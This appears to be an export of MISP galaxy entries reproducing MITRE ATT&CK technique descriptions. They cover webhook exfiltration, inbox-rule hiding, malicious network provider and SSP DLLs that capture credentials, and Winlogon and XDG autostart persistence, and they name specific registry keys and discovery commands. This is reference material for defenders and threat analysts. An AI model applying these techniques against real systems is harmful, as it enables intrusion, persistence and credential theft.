https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

Exfiltration Over Webhook - T1567.004

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.

Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)

Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Webhook - T1567.004"

Table 5763. Table References

Links

https://attack.mitre.org/techniques/T1567/004

https://blog.talosintelligence.com/collab-app-abuse/

https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md

https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191

https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord

https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/

https://www.redhat.com/en/topics/automation/what-is-a-webhook

Email Hiding Rules - T1564.008

Adversaries may use email rules to hide inbound emails in a compromised user’s mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

Adversaries may utilize email rules within a compromised user’s mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)

In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).

The tag is: misp-galaxy:mitre-attack-pattern="Email Hiding Rules - T1564.008"

Table 5764. Table References

Links

https://attack.mitre.org/techniques/T1564/008

https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps

https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps

https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules

https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac

https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154

https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/

Revert Cloud Instance - T1578.004

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1578.004"

Table 5765. Table References

Links

https://attack.mitre.org/techniques/T1578/004

https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/

Network Provider DLL - T1556.008

Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local mpnotify.exe process via RPC. The mpnotify.exe process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify)

Adversaries can configure a malicious network provider DLL to receive credentials from mpnotify.exe.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the NPLogonNotify() function.(Citation: NPLogonNotify)

Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)

The tag is: misp-galaxy:mitre-attack-pattern="Network Provider DLL - T1556.008"

Table 5766. Table References

Links

https://attack.mitre.org/techniques/T1556/008

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify

https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api

https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy

https://www.youtube.com/watch?v=ggY3srD9dYs

Spoof Security Alerting - T1562.011

Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.

Rather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.

For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)

The tag is: misp-galaxy:mitre-attack-pattern="Spoof Security Alerting - T1562.011"

Table 5767. Table References

Links

https://attack.mitre.org/techniques/T1562/011

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

Ignore Process Interrupts - T1564.011

Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man) These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes.

Adversaries may invoke processes using nohup, [PowerShell](https://attack.mitre.org/techniques/T1059/001) -ErrorAction SilentlyContinue, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.

Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.

The tag is: misp-galaxy:mitre-attack-pattern="Ignore Process Interrupts - T1564.011"

Table 5768. Table References

Links

https://attack.mitre.org/techniques/T1564/011

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference

https://linux.die.net/man/1/nohup

https://man7.org/linux/man-pages/man7/signal.7.html

XDG Autostart Entries - T1547.013

Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (.desktop) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)

Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the Exec directive in the .desktop configuration file. When the user’s desktop environment is loaded at user login, the .desktop files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the /etc/xdg/autostart directory while the user entries are located in the ~/.config/autostart directory.

Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)

The tag is: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013"

Table 5769. Table References

Links

https://attack.mitre.org/techniques/T1547/013

https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/

https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html

https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html

Identify business processes/tempo - T1280

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1280).

Understanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business processes/tempo - T1280"

Table 5770. Table References

Links

https://attack.mitre.org/techniques/T1280

System Owner/User Discovery - T1033

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as show users and show ssh can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033"

Table 5771. Table References

Links

https://attack.mitre.org/techniques/T1033

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html

Disguise Root/Jailbreak Indicators - T1408

An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).

The tag is: misp-galaxy:mitre-attack-pattern="Disguise Root/Jailbreak Indicators - T1408"

Table 5772. Table References

Links

http://pages.cs.wisc.edu/vrastogi/static/papers/rcj13b.pdf

http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions

https://attack.mitre.org/techniques/T1408

https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html

Obtain templates/branding materials - T1281

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1281).

Templates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain templates/branding materials - T1281"

Table 5773. Table References

Links

https://attack.mitre.org/techniques/T1281

Research relevant vulnerabilities/CVEs - T1291

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1291).

Common Vulnerability Enumeration (CVE) is a dictionary of publicly known information about security vulnerabilities and exposures. An adversary can use this information to target specific software that may be vulnerable. (Citation: WeaponsVulnerable) (Citation: KasperskyCarbanak)

The tag is: misp-galaxy:mitre-attack-pattern="Research relevant vulnerabilities/CVEs - T1291"

Table 5774. Table References

Links

https://attack.mitre.org/techniques/T1291

https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/

Conduct cost/benefit analysis - T1226

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1226).

Leadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Toptic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct cost/benefit analysis - T1226"

Table 5775. Table References

Links

https://attack.mitre.org/techniques/T1226

Assess KITs/KIQs benefits - T1229

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1229).

Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) may be further subdivided to focus on political, economic, diplomatic, military, financial, or intellectual property categories. An adversary may specify KITs or KIQs in this manner in order to understand how the information they are pursuing can have multiple uses and to consider all aspects of the types of information they need to target for a particular purpose. (Citation: CompetitiveIntelligence) (Citation: CompetitiveIntelligence)KIT.

The tag is: misp-galaxy:mitre-attack-pattern="Assess KITs/KIQs benefits - T1229"

Table 5776. Table References

Links

https://attack.mitre.org/techniques/T1229

Determine approach/attack vector - T1245

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1245).

The approach or attack vector outlines the specifics behind how the adversary would like to attack the target. As additional information is known through the other phases of PRE-ATT&CK, an adversary may update the approach or attack vector. (Citation: CyberAdversaryBehavior) (Citation: WITCHCOVEN2015) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine approach/attack vector - T1245"

Table 5777. Table References

Links

https://attack.mitre.org/techniques/T1245

Mine technical blogs/forums - T1257

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1257).

Technical blogs and forums provide a way for technical staff to ask for assistance or troubleshoot problems. In doing so they may reveal information such as operating system (OS), network devices, or applications in use. (Citation: FunAndSun2012)

The tag is: misp-galaxy:mitre-attack-pattern="Mine technical blogs/forums - T1257"

Table 5778. Table References

Links

https://attack.mitre.org/techniques/T1257

Unused/Unsupported Cloud Regions - T1535

Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)

The tag is: misp-galaxy:mitre-attack-pattern="Unused/Unsupported Cloud Regions - T1535"

Table 5779. Table References

Links

https://attack.mitre.org/techniques/T1535

https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc

Search Open Websites/Domains - T1593

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Open Websites/Domains - T1593"

Table 5780. Table References

Links

https://attack.mitre.org/techniques/T1593

https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e

https://securitytrails.com/blog/google-hacking-techniques

https://www.exploit-db.com/google-hacking-database

Obtain booter/stressor subscription - T1396

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1396).

Configure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain booter/stressor subscription - T1396"

Table 5781. Table References

Links

https://attack.mitre.org/techniques/T1396

https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/

https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

Application Window Discovery - T1010

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.

The tag is: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"

Table 5782. Table References

Links

https://attack.mitre.org/techniques/T1010

https://www.prevailion.com/darkwatchman-new-fileless-techniques/

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

OS Credential Dumping - T1003

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

The tag is: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"

Table 5783. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

https://adsecurity.org/?p=1729

https://attack.mitre.org/techniques/T1003

https://github.com/mattifestation/PowerSploit

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

https://msdn.microsoft.com/library/cc228086.aspx

https://msdn.microsoft.com/library/cc237008.aspx

https://msdn.microsoft.com/library/cc245496.aspx

https://msdn.microsoft.com/library/dd207691.aspx

https://wiki.samba.org/index.php/DRSUAPI

Winlogon Helper DLL - T1004

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events

  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on

  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004"

Table 5784. Table References

Links

https://attack.mitre.org/techniques/T1004

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

https://capec.mitre.org/data/definitions/579.html

https://technet.microsoft.com/en-us/sysinternals/bb963902

Modify System Partition - T1400

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.

Many Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.

The tag is: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400"

Table 5785. Table References

Links

https://attack.mitre.org/techniques/T1400

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

https://source.android.com/security/verifiedboot/

https://www.apple.com/business/docs/iOS_Security_Guide.pdf

Compile After Delivery - T1500

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1500"

Table 5786. Table References

Links

https://attack.mitre.org/techniques/T1500

https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

Direct Volume Access - T1006

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as vssadmin, wbadmin, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)

The tag is: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006"

Table 5787. Table References

Links

http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin

https://attack.mitre.org/techniques/T1006

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

https://lolbas-project.github.io/lolbas/Binaries/Esentutl/

System Service Discovery - T1007

Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.

Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007"

Table 5788. Table References

Links

https://attack.mitre.org/techniques/T1007

Taint Shared Content - T1080

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary’s code on a remote system. Adversaries may use tainted shared content to move laterally.

A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user’s expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)

Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.

The tag is: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080"

Table 5789. Table References

Links

https://attack.mitre.org/techniques/T1080

https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html

Security Support Provider - T1101

Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1101"

Table 5790. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1101

https://technet.microsoft.com/en-us/library/dn408187.aspx

Peripheral Device Discovery - T1120

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

The tag is: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"

Table 5791. Table References

Links

https://attack.mitre.org/techniques/T1120

https://linuxhint.com/list-usb-devices-linux/

https://ss64.com/osx/system_profiler.html

Password Policy Discovery - T1201

Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).(Citation: US-CERT-TA18-106A)

Password policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS (Citation: AWS GetPasswordPolicy).

The tag is: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201"

Table 5792. Table References

Links

https://attack.mitre.org/techniques/T1201

https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html

https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu

https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines

https://www.us-cert.gov/ncas/alerts/TA18-106A

Analyze business processes - T1301

